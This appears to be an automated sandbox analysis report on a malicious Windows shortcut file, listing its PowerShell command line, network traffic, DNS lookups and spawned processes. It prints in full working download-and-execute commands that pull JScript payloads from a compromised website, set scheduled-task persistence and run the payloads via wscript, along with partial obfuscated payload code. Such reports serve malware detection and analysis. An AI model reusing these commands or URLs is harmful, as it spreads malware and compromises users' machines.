                                              SHA256:e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b
                                              SHA512:d7937781c09595c1b0c4a058929579a7499b7e28c67ef48f3ab6704a4c3b2b80cea38a1452f275e0b1205ddbabeeceaadf3c3fcd84be8fb6270904859eeff6c3
                                              SSDEEP:48:8Qk110gZ1sAT11PAb4+bRVM3eEbS0AWndoITXuH9tpEY:8Qk12msEc4QQuCAWOaudt
                                              TLSH:8481A81027F50718F6F79B3DA8BBB226597B7949D922CA8D0091524C0872A11E839F7B
                                              File Content Preview:L..................F.B.. .....qf.........@..N.rf.................................P.O. .:i.....+00.../C:\...................V.1.....sY....Windows.@........OwHzYD}.... .......................7.W.i.n.d.o.w.s.....Z.1.....zY+n..System32..B........OwHzY........

                                              File Icon

                                              Icon Hash:72d282828e8d8dd5

                                              Static Windows Shortcut Info

                                              General

                                              Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Command Line Argument: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
                                              Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-03T09:15:01.128993+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64971046.254.34.201443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 3, 2024 09:14:56.969717979 CET49709443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:56.969758987 CET4434970946.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:56.969852924 CET49709443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:56.978415966 CET49709443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:56.978435993 CET4434970946.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:58.413769007 CET4434970946.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:58.413870096 CET49709443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:58.417928934 CET49709443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:58.417939901 CET4434970946.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:58.418174028 CET4434970946.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:58.424782038 CET49709443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:58.471330881 CET4434970946.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:58.954806089 CET4434970946.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:58.954871893 CET4434970946.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:58.954930067 CET49709443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:58.995137930 CET49709443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:59.013461113 CET49710443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:59.013510942 CET4434971046.254.34.201192.168.2.6
                                              Dec 3, 2024 09:14:59.013617039 CET49710443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:59.017191887 CET49710443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:14:59.017210960 CET4434971046.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:00.492170095 CET4434971046.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:00.493995905 CET49710443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:00.494021893 CET4434971046.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:01.129013062 CET4434971046.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:01.129086971 CET4434971046.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:01.129144907 CET49710443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:01.129479885 CET49710443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:05.201143980 CET49714443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:05.201199055 CET4434971446.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:05.201267004 CET49714443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:05.209424973 CET49714443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:05.209439993 CET4434971446.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:05.945151091 CET49715443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:05.945163012 CET4434971546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:05.945224047 CET49715443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:05.948632956 CET49715443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:05.948642969 CET4434971546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:06.885099888 CET4434971446.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:06.885168076 CET49714443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:06.888350964 CET49714443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:06.888358116 CET4434971446.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:06.888597965 CET4434971446.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:06.899806976 CET49714443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:06.943344116 CET4434971446.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:07.469029903 CET4434971546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:07.469136953 CET49715443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:07.471441031 CET49715443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:07.471450090 CET4434971546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:07.471683025 CET4434971546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:07.645379066 CET49715443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:07.691328049 CET4434971546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:08.091950893 CET4434971546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:08.092124939 CET4434971546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:08.092176914 CET49715443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:08.123981953 CET49715443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:08.446676016 CET4434971446.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:08.446749926 CET4434971446.254.34.201192.168.2.6
                                              Dec 3, 2024 09:15:08.446804047 CET49714443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:15:08.528273106 CET49714443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:16:03.945152044 CET49855443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:16:03.945190907 CET4434985546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:16:03.945346117 CET49855443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:16:03.949456930 CET49855443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:16:03.949470997 CET4434985546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:16:05.489314079 CET4434985546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:16:05.489427090 CET49855443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:16:05.497368097 CET49855443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:16:05.497383118 CET4434985546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:16:05.497658014 CET4434985546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:16:05.510967016 CET49855443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:16:05.555332899 CET4434985546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:16:06.057177067 CET4434985546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:16:06.057238102 CET4434985546.254.34.201192.168.2.6
                                              Dec 3, 2024 09:16:06.057307005 CET49855443192.168.2.646.254.34.201
                                              Dec 3, 2024 09:16:06.337255001 CET49855443192.168.2.646.254.34.201

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 3, 2024 09:14:56.825391054 CET6530853192.168.2.61.1.1.1
                                              Dec 3, 2024 09:14:56.964092016 CET53653081.1.1.1192.168.2.6

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 3, 2024 09:14:56.825391054 CET192.168.2.61.1.1.10x9e59Standard query (0)www.italialife24.itA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 3, 2024 09:14:56.964092016 CET1.1.1.1192.168.2.60x9e59No error (0)www.italialife24.ititalialife24.itCNAME (Canonical name)IN (0x0001)false
                                              Dec 3, 2024 09:14:56.964092016 CET1.1.1.1192.168.2.60x9e59No error (0)italialife24.it46.254.34.201A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.italialife24.it

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.64970946.254.34.2014435464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:14:58 UTC113OUTGET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1
                                              Host: www.italialife24.it
                                              Connection: Keep-Alive
                                              2024-12-03 08:14:58 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:14:58 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:14:58 UTC18INData Raw: 38 0d 0a 77 73 63 72 69 70 74 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 8wscript 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.64971046.254.34.2014435464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:15:00 UTC92OUTGET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1
                                              Host: www.italialife24.it
                                              2024-12-03 08:15:01 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:15:00 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:15:01 UTC316INData Raw: 31 33 30 0d 0a 76 61 72 20 66 6e 6e 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 66 6e 6e 2e 52 75 6e 28 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 5c 22 49 57 52 20 2d 6f 75 74 66 69 20 24 65 6e 76 3a 70 72 6f 67 72 61 6d 64 61 74 61 5c 5c 32 34 31 58 55 36 4b 56 32 44 46 48 2e 6a 73 20 2d 75 73 65 62 61 73 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 61 6c 69 61 6c 69 66 65 32 34 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 35 2f 61 66 72 65 74 50 66 2e 70 68 70 27 3b 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 22 20 2b 20 57 53 63 72 69 70 74 2e 61 72 67 75 6d 65 6e 74 73 28 30 29 20 2b 20 22
                                              Data Ascii: 130var fnn = new ActiveXObject("WScript.Shell")fnn.Run("powershell -command \"IWR -outfi $env:programdata\\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + "


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.64971446.254.34.2014434176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:15:06 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                              Host: www.italialife24.it
                                              Connection: Keep-Alive
                                              2024-12-03 08:15:08 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:15:07 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:15:08 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                              Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.64971546.254.34.2014434236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:15:07 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                              Host: www.italialife24.it
                                              Connection: Keep-Alive
                                              2024-12-03 08:15:08 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:15:07 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:15:08 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                              Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.64985546.254.34.2014432976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-03 08:16:05 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                              Host: www.italialife24.it
                                              Connection: Keep-Alive
                                              2024-12-03 08:16:06 UTC253INHTTP/1.1 200 OK
                                              Date: Tue, 03 Dec 2024 08:16:05 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-12-03 08:16:06 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                              Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:14:52
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
                                              Imagebase:0x7ff6e3d50000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:03:14:52
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:03:14:59
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0
                                              Imagebase:0x7ff67e450000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:03:15:00
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
                                              Imagebase:0x7ff6b33f0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:03:15:01
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
                                              Imagebase:0x7ff6e3d50000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:03:15:01
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:03:15:01
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
                                              Imagebase:0x7ff6b33f0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:03:15:03
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
                                              Imagebase:0x7ff6e3d50000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:03:15:03
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:03:15:06
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
                                              Imagebase:0x7ff67e450000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:03:15:06
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
                                              Imagebase:0x7ff6b33f0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:03:15:07
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
                                              Imagebase:0x7ff67e450000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:03:15:07
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
                                              Imagebase:0x7ff6b33f0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:03:16:00
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
                                              Imagebase:0x7ff6b33f0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:03:16:01
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
                                              Imagebase:0x7ff6e3d50000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:21
                                              Start time:03:16:01
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
